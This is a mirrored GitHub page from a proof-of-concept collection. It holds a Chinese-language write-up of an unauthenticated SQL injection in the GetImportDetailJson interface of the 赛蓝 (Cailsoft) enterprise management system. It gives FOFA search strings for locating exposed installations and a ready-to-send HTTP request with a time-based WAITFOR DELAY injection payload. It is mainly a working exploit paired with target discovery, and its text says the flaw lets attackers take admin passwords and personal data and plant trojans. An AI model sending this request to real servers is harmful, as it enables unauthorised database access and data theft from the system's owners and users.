admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 19:16:12 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/赛蓝企业管理系统/赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞.md

18 lines
652 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞
赛蓝企业管理系统 **GetImportDetailJson**接口处SQL注入漏洞未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
## fofa
```yaml
body="www.cailsoft.com" || body="赛蓝企业管理系统"
```
## poc
```java
GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27%3bWAITFOR+DELAY+%270%3a0%3a5%27--&IsShow=1 HTTP/1.1
Host: {{Hostname}}
```
Reference in New Issue Copy Permalink